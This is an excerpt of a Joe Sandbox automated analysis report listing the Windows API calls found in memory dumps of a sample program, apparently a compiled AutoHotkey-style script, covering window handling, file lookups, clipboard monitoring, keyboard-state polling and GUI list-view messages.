      • Part of subcall function 00486FE5: __mbctoupper_l.LIBCMT ref: 00486FEF
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • SendMessageA.USER32(000801CA,0000000C,00000000,Script info will not be shown because the "Menu, Tray, MainWindow"command option was not enabled in the original script.), ref: 0043931A
      • Part of subcall function 0042CA10: GetTickCount.KERNEL32 ref: 0042CAED
      • Part of subcall function 0040C210: __itow.LIBCMT ref: 0040C2B0
      • Part of subcall function 0040C210: __itow.LIBCMT ref: 0040C411
      • Part of subcall function 0040C210: __itow.LIBCMT ref: 0040C43B
      • Part of subcall function 0040C210: CharUpperA.USER32(?), ref: 0040C452
      • Part of subcall function 0042E020: GetForegroundWindow.USER32 ref: 0042E030
      • Part of subcall function 0042E020: GetWindowTextA.USER32(00000000,?,00000064), ref: 0042E047
      • Part of subcall function 0042E020: _strncpy.LIBCMT ref: 0042E0F0
    • SendMessageA.USER32(000801CA,0000000C,00000000,?), ref: 004393D2
    • IsWindowVisible.USER32(000601DA), ref: 004393DA
    • ShowWindow.USER32(000601DA,00000005), ref: 004393F3
    • IsIconic.USER32(000601DA), ref: 004393FC
    • ShowWindow.USER32(000601DA,00000009), ref: 0043940E
    • GetForegroundWindow.USER32 ref: 00439410
    • SetForegroundWindow.USER32(000601DA), ref: 00439421
      • Part of subcall function 00475520: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0047553B
      • Part of subcall function 00475520: GetForegroundWindow.USER32 ref: 0047555A
      • Part of subcall function 00475520: FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 0047556C
      • Part of subcall function 00475520: IsIconic.USER32(00000000), ref: 00475583
      • Part of subcall function 00475520: ShowWindow.USER32(00000000,00000009), ref: 00475590
      • Part of subcall function 00475520: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004755C1
      • Part of subcall function 00475520: AttachThreadInput.USER32(00000E10,00000000,00000001), ref: 004755E7
      • Part of subcall function 00475520: AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00475600
      • Part of subcall function 00475520: SetForegroundWindow.USER32(00000000), ref: 00475621
      • Part of subcall function 00475520: GetForegroundWindow.USER32 ref: 00475643
      • Part of subcall function 00475520: GetWindow.USER32(00000000,00000004), ref: 0047565A
      • Part of subcall function 00475520: AttachThreadInput.USER32(00000E10,?,00000000), ref: 004756BE
      • Part of subcall function 00475520: AttachThreadInput.USER32(?,?,00000000), ref: 004756D7
      • Part of subcall function 00475520: BringWindowToTop.USER32(00000000), ref: 004756E2
    • SendMessageA.USER32(000801CA,000000B6,00000000,000F423F), ref: 0043944C
    Strings
    • Script info will not be shown because the "Menu, Tray, MainWindow"command option was not enabled in the original script., xrefs: 00439310
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetFileAttributesA.KERNEL32(?), ref: 0045117A
    • FindFirstFileA.KERNEL32(?,?), ref: 00451196
    • FindClose.KERNEL32(00000000), ref: 004511A6
    • CoInitialize.OLE32(00000000), ref: 004511AE
    • CoCreateInstance.OLE32(00496770,00000000,00000001,00496760,?), ref: 004511C7
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000105), ref: 00451209
    • CoUninitialize.OLE32 ref: 004513A2
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • CreateFileA.KERNEL32(?,00000080,00000007,00000000,00000003,00000000,00000000), ref: 0044173A
    • GetFileSizeEx.KERNEL32(00000000,?,?,00000080,00000007,00000000,00000003,00000000,00000000), ref: 0044174D
    • CloseHandle.KERNEL32(00000000), ref: 00441756
    • FindFirstFileA.KERNEL32(?,00000000,?,00000080,00000007,00000000,00000003,00000000,00000000), ref: 00441766
    • GetLastError.KERNEL32(?,00000000,?,00000080,00000007,00000000,00000003,00000000,00000000), ref: 00441771
    • FindClose.KERNEL32(00000000,?,00000000,?,00000080,00000007,00000000,00000003,00000000,00000000), ref: 004417AD
    • __alldiv.INT64 ref: 0044181B
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • __Stoull.NTSTC_LIBCMT ref: 004726F8
    • FindFirstFileA.KERNEL32(00000000,?,?,?,?), ref: 0047271D
    • FindClose.KERNEL32(00000000,?,?,?), ref: 00472729
    • GetFileAttributesA.KERNEL32(00000000,?,?,?), ref: 00472744
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetTickCount.KERNEL32(761C44CF,00000000,00000000,004040C7,004AC8E0,?,004987E9,00401033,?,?,0046A420,00000000,?,00000005,?,00000000), ref: 0040463B
    • OpenClipboard.USER32(000601DA), ref: 0040464C
    • GetTickCount.KERNEL32(?,004987E9,00401033,?,?,0046A420,00000000,?,00000005,?,00000000,?), ref: 00404660
    • OpenClipboard.USER32(000601DA), ref: 0040469A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • PostMessageA.USER32(000601DA,00000415,00000001,00000000), ref: 004155D4
    • SetClipboardViewer.USER32(000601DA), ref: 004155E7
    • ChangeClipboardChain.USER32(000601DA,?), ref: 00415629
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • FindFirstFileA.KERNEL32(004987E9,?), ref: 00440FEB
    • GetLastError.KERNEL32(?,?), ref: 00440FF6
    • FindClose.KERNEL32(00000000), ref: 00441034
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0044108D
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00410200: GetCursorPos.USER32(004A9140), ref: 00410298
      • Part of subcall function 00410200: GetCursorPos.USER32(?), ref: 004102B5
      • Part of subcall function 00410200: GetSystemMetrics.USER32(00000000), ref: 00410310
      • Part of subcall function 00410200: GetSystemMetrics.USER32(00000001), ref: 00410316
      • Part of subcall function 00410200: GetCursorPos.USER32(?), ref: 00410375
      • Part of subcall function 0040E650: GetTickCount.KERNEL32 ref: 0040E6A8
      • Part of subcall function 0040E650: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0040E6CB
      • Part of subcall function 0040E650: GetTickCount.KERNEL32(?,00000000), ref: 0040E6F5
      • Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A0), ref: 0040E734
      • Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A1), ref: 0040E747
      • Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A2), ref: 0040E75B
      • Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A3), ref: 0040E76F
      • Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A4), ref: 0040E783
      • Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A5), ref: 0040E797
      • Part of subcall function 0040E650: GetAsyncKeyState.USER32(0000005B), ref: 0040E7A8
      • Part of subcall function 0040E650: GetAsyncKeyState.USER32(0000005C), ref: 0040E7B9
      • Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A0), ref: 0040E8DE
      • Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A1), ref: 0040E8F1
      • Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A2), ref: 0040E905
      • Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A3), ref: 0040E919
      • Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A4), ref: 0040E92D
      • Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A5), ref: 0040E941
      • Part of subcall function 0040E650: GetAsyncKeyState.USER32(0000005B), ref: 0040E952
      • Part of subcall function 0040E650: GetAsyncKeyState.USER32(0000005C), ref: 0040E963
      • Part of subcall function 0040E9F0: __itow.LIBCMT ref: 0040EA0E
      • Part of subcall function 0040E9F0: GetTickCount.KERNEL32(?,?,00000000,?,?,?), ref: 0040EA39
      • Part of subcall function 0040E9F0: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0040EA5C
      • Part of subcall function 0040E9F0: GetTickCount.KERNEL32(?,00000000,?,?,?), ref: 0040EA81
    • GetAsyncKeyState.USER32(0000005B), ref: 0040D688
    • GetAsyncKeyState.USER32(0000005C), ref: 0040D696
    • GetForegroundWindow.USER32 ref: 0040D6F2
    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040D6FF
    • GetKeyboardLayout.USER32(00000000), ref: 0040D708
      • Part of subcall function 00411970: VkKeyScanExA.USER32(00000020,00000000), ref: 004119F6
      • Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A0), ref: 00411465
      • Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A1), ref: 00411478
      • Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A2), ref: 0041148C
      • Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A3), ref: 004114A0
      • Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A4), ref: 004114B4
      • Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A5), ref: 004114C8
      • Part of subcall function 00411440: GetAsyncKeyState.USER32(0000005B), ref: 004114D9
      • Part of subcall function 00411440: GetAsyncKeyState.USER32(0000005C), ref: 004114EA
    • GetTickCount.KERNEL32 ref: 0040D757
    • GetWindowThreadProcessId.USER32(00000000), ref: 0040E585
      • Part of subcall function 00410C30: GetKeyState.USER32(?), ref: 00410C3B
      • Part of subcall function 00410C30: GetKeyState.USER32(?), ref: 00410C6A
      • Part of subcall function 00410C30: GetForegroundWindow.USER32 ref: 00410CA4
      • Part of subcall function 00410C30: GetWindowThreadProcessId.USER32(00000000), ref: 00410CAB
      • Part of subcall function 00410C30: GetKeyState.USER32(00000014), ref: 00410CEE
    • GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040D88C
    • GetProcAddress.KERNEL32(00000000), ref: 0040D893
    • GetTickCount.KERNEL32 ref: 0040D8E1
    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0040D906
    • GetTickCount.KERNEL32 ref: 0040D930
    • __Stoull.NTSTC_LIBCMT ref: 0040DA37
    • __Stoull.NTSTC_LIBCMT ref: 0040DA4B
    • __Stoull.NTSTC_LIBCMT ref: 0040DA84
      • Part of subcall function 00485220: __mbsnbicmp_l.LIBCMT ref: 00485230
    • __Stoull.NTSTC_LIBCMT ref: 0040DB33
    • __Stoull.NTSTC_LIBCMT ref: 0040DBA2
    • __Stoull.NTSTC_LIBCMT ref: 0040DBBC
    • PostMessageA.USER32(?,00000102,?,00000000), ref: 0040DD0A
    • GetAsyncKeyState.USER32(000000A0), ref: 0040DDA2
    • GetAsyncKeyState.USER32(000000A1), ref: 0040DDB5
    • GetAsyncKeyState.USER32(000000A2), ref: 0040DDC9
    • GetAsyncKeyState.USER32(000000A3), ref: 0040DDDD
    • GetAsyncKeyState.USER32(000000A4), ref: 0040DDF1
    • GetAsyncKeyState.USER32(000000A5), ref: 0040DE05
    • GetAsyncKeyState.USER32(0000005B), ref: 0040DE16
    • GetAsyncKeyState.USER32(0000005C), ref: 0040DE27
    • GetTickCount.KERNEL32 ref: 0040DEC9
    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0040DEEE
    • GetTickCount.KERNEL32 ref: 0040DF18
    • __Stoull.NTSTC_LIBCMT ref: 0040DF44
    • __Stoull.NTSTC_LIBCMT ref: 0040DFC0
    • PostMessageW.USER32(00000000,00000102,?,00000000), ref: 0040DFF1
    • __itow.LIBCMT ref: 0040E021
      • Part of subcall function 0040EAD0: GetAsyncKeyState.USER32(000000A0), ref: 0040EB06
      • Part of subcall function 0040EAD0: GetAsyncKeyState.USER32(000000A1), ref: 0040EB19
      • Part of subcall function 0040EAD0: GetAsyncKeyState.USER32(000000A2), ref: 0040EB2D
      • Part of subcall function 0040EAD0: GetAsyncKeyState.USER32(000000A3), ref: 0040EB41
      • Part of subcall function 0040EAD0: GetAsyncKeyState.USER32(000000A4), ref: 0040EB55
      • Part of subcall function 0040EAD0: GetAsyncKeyState.USER32(000000A5), ref: 0040EB69
      • Part of subcall function 0040EAD0: GetAsyncKeyState.USER32(0000005B), ref: 0040EB7A
      • Part of subcall function 0040EAD0: GetAsyncKeyState.USER32(0000005C), ref: 0040EB8B
      • Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A0), ref: 0040D0D5
      • Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A1), ref: 0040D0E8
      • Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A2), ref: 0040D0FC
      • Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A3), ref: 0040D110
      • Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A4), ref: 0040D124
      • Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A5), ref: 0040D138
      • Part of subcall function 0040D090: GetAsyncKeyState.USER32(0000005B), ref: 0040D149
      • Part of subcall function 0040D090: GetAsyncKeyState.USER32(0000005C), ref: 0040D15A
      • Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A0), ref: 0040D1DD
      • Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A1), ref: 0040D1F0
      • Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A2), ref: 0040D204
      • Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A3), ref: 0040D218
      • Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A4), ref: 0040D22C
      • Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A5), ref: 0040D240
      • Part of subcall function 0040D090: GetAsyncKeyState.USER32(0000005B), ref: 0040D251
      • Part of subcall function 0040D090: GetAsyncKeyState.USER32(0000005C), ref: 0040D262
      • Part of subcall function 0040D090: SendInput.USER32(00000002,?,0000001C), ref: 0040D4C7
    • PostMessageA.USER32(?,00000102,00000000,00000000), ref: 0040E216
      • Part of subcall function 00411DB0: VkKeyScanExA.USER32(00000000,00000000), ref: 00411DB9
      • Part of subcall function 00410D40: GetWindowThreadProcessId.USER32(?,00000000), ref: 00411409
      • Part of subcall function 00410820: SendInput.USER32(00000000,00000000,0000001C), ref: 00410880
      • Part of subcall function 00410820: GetForegroundWindow.USER32 ref: 004108C3
      • Part of subcall function 00410820: SetWindowsHookExA.USER32(00000001,0040EC50,00400000,00000000), ref: 00410900
      • Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
      • Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0
    • GetTickCount.KERNEL32 ref: 0040E31E
    • GetAsyncKeyState.USER32(000000A0), ref: 0040E38C
    • GetAsyncKeyState.USER32(000000A1), ref: 0040E39F
    • GetAsyncKeyState.USER32(000000A2), ref: 0040E3B3
    • GetAsyncKeyState.USER32(000000A3), ref: 0040E3C7
    • GetAsyncKeyState.USER32(000000A4), ref: 0040E3DB
    • GetAsyncKeyState.USER32(000000A5), ref: 0040E3EF
    • GetAsyncKeyState.USER32(0000005B), ref: 0040E400
    • GetAsyncKeyState.USER32(0000005C), ref: 0040E411
    • GetKeyState.USER32(00000014), ref: 0040E4B1
    • GetKeyState.USER32(00000014), ref: 0040E4B9
      • Part of subcall function 0040EEC0: GetCurrentThreadId.KERNEL32(?,?,?), ref: 0040EEEC
      • Part of subcall function 0040EEC0: GetKeyboardState.USER32(?), ref: 0040EFB6
      • Part of subcall function 0040EEC0: SetKeyboardState.USER32(?), ref: 0040F055
      • Part of subcall function 0040EEC0: PostMessageA.USER32(00000000,00000100,00000000,?), ref: 0040F081
      • Part of subcall function 0040EEC0: PostMessageA.USER32(00000000,00000101,00000000,?), ref: 0040F0BE
      • Part of subcall function 0040EEC0: GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040F10E
      • Part of subcall function 0040EEC0: GetProcAddress.KERNEL32(00000000), ref: 0040F115
      • Part of subcall function 0040EEC0: GetForegroundWindow.USER32 ref: 0040F189
      • Part of subcall function 0040EEC0: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040F196
      • Part of subcall function 0040EEC0: GetKeyboardLayout.USER32(00000000), ref: 0040F1A1
      • Part of subcall function 0040EEC0: GetAsyncKeyState.USER32 ref: 0040F1CC
      • Part of subcall function 0040EEC0: keybd_event.USER32(00000000,?,?,00000000), ref: 0040F297
      • Part of subcall function 0040EEC0: GetAsyncKeyState.USER32(?), ref: 0040F2E2
      • Part of subcall function 0040EEC0: keybd_event.USER32(00000000,?,00000002,00000000), ref: 0040F3C2
      • Part of subcall function 0040EEC0: GetAsyncKeyState.USER32(?), ref: 0040F3FD
      • Part of subcall function 0040EEC0: GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040F476
      • Part of subcall function 0040EEC0: GetProcAddress.KERNEL32(00000000), ref: 0040F47D
    • GetForegroundWindow.USER32 ref: 0040E4ED
    • GetWindowThreadProcessId.USER32(00000000), ref: 0040E4F4
    • AttachThreadInput.USER32(00000E10,?,00000000), ref: 0040E529
    • GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040E552
    • GetProcAddress.KERNEL32(00000000), ref: 0040E559
    • GetForegroundWindow.USER32 ref: 0040E57E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • _strncpy.LIBCMT ref: 0043EE9A
    • __Stoull.NTSTC_LIBCMT ref: 0043EEB5
    • GetFileAttributesA.KERNEL32(?), ref: 0043EF08
    • _strncpy.LIBCMT ref: 0043EF3D
    • _strncpy.LIBCMT ref: 0043EF68
    • _strncpy.LIBCMT ref: 0043EF91
      • Part of subcall function 004719A0: _vswprintf_s.LIBCMT ref: 004719B9
    • _strncpy.LIBCMT ref: 0043F01E
    • _strncpy.LIBCMT ref: 0043F099
    • PostMessageA.USER32(000601DA,00000044,00000403,00000000), ref: 0043F22A
    • 75B0A2A9.COMDLG32(?), ref: 0043F256
    • SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop), ref: 0043F295
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • __Stoull.NTSTC_LIBCMT ref: 0044B505
      • Part of subcall function 00485220: __mbsnbicmp_l.LIBCMT ref: 00485230
    • __Stoull.NTSTC_LIBCMT ref: 0044B545
    • __Stoull.NTSTC_LIBCMT ref: 0044B588
    • __Stoull.NTSTC_LIBCMT ref: 0044B5DD
    • __Stoull.NTSTC_LIBCMT ref: 0044B60E
    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0044B688
    • SendMessageA.USER32(?,00001007,00000000,00000008), ref: 0044B707
    • SendMessageA.USER32(?,00001006,00000000,00000008), ref: 0044B753
    • SendMessageA.USER32(?,00001013,?,00000000), ref: 0044B778
    • SendMessageA.USER32(00000000,00001006,00000000,?), ref: 0044B7CC
    • SendMessageA.USER32(001BC918,0000102F,?,00000000), ref: 0044B822
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00473B50: LoadLibraryA.KERNEL32(uxtheme), ref: 00473B5C
      • Part of subcall function 00473B50: GetProcAddress.KERNEL32(00000000,SetWindowTheme,?,?), ref: 00473B6E
      • Part of subcall function 00473B50: FreeLibrary.KERNEL32(00000000,?,?), ref: 00473B8C
    • CreateWindowExA.USER32(?,SysListView32,004987E9,?,?,?,?,?,?,?,00400000,00000000), ref: 0045E141
    • InvalidateRect.USER32(00000013,?,00000000), ref: 0045F42F
      • Part of subcall function 00484959: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 0048499E
    • DestroyWindow.USER32(00000000), ref: 0045E169
    • SendMessageA.USER32(?,0000108E,00000004,00000000), ref: 0045E1D0
    • SendMessageA.USER32(?,00001036,00000000,?), ref: 0045E1E6
      • Part of subcall function 004666E0: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004666FC
      • Part of subcall function 004666E0: SendMessageA.USER32(?,0000102F,00000000,00000000), ref: 00466710
      • Part of subcall function 004666E0: SendMessageA.USER32(?,00001024,00000000,?), ref: 0046673F
      • Part of subcall function 004666E0: GetSysColor.USER32(00000005), ref: 00466753
      • Part of subcall function 004666E0: SendMessageA.USER32(?,00001026,00000000,?), ref: 00466766
      • Part of subcall function 004666E0: SendMessageA.USER32(?,00001001,00000000,?), ref: 00466773
      • Part of subcall function 004666E0: InvalidateRect.USER32(00000000,00000000,00000001), ref: 0046677C
    • SendMessageA.USER32(?,00000030,?,?), ref: 0045E227
    • GetDC.USER32(?), ref: 0045E251
    • SelectObject.GDI32(00000000,?), ref: 0045E26F
    • GetTextMetricsA.GDI32(?,?), ref: 0045E282
    • SendMessageA.USER32(?,00001033,00000000,00000000), ref: 0045E2A3
    • GetSystemMetrics.USER32(0000000C), ref: 0045E2F9
    • GetSystemMetrics.USER32(00000032), ref: 0045E329
    • SendMessageA.USER32(?,00001033,00000000,00000000), ref: 0045E370
    • SendMessageA.USER32(?,00001040,?,000000FF), ref: 0045E3C7
    • MoveWindow.USER32(?,?,?,?,-00000004,00000001), ref: 0045E3F5
    • SelectObject.GDI32(?,?), ref: 0045E6AA
    • ReleaseDC.USER32(?,?), ref: 0045E6B5
    • SendMessageA.USER32(?,00000030,?,?), ref: 0045F28C
    • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0045F2A6
    • GetClientRect.USER32(?,?), ref: 0045F2EF
    • SetWindowLongA.USER32(?,000000F0,?), ref: 0045F319
    • SendMessageA.USER32(?,00001328,00000001,?), ref: 0045F32F
    • SetWindowLongA.USER32(?,000000F0,?), ref: 0045F344
    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0045F378
    • GetWindowRect.USER32(?,?), ref: 0045F38E
    • SendMessageA.USER32(?,00000194,?,00000000), ref: 0045F3E7
    • GetWindowRect.USER32(?,?), ref: 0045F40B
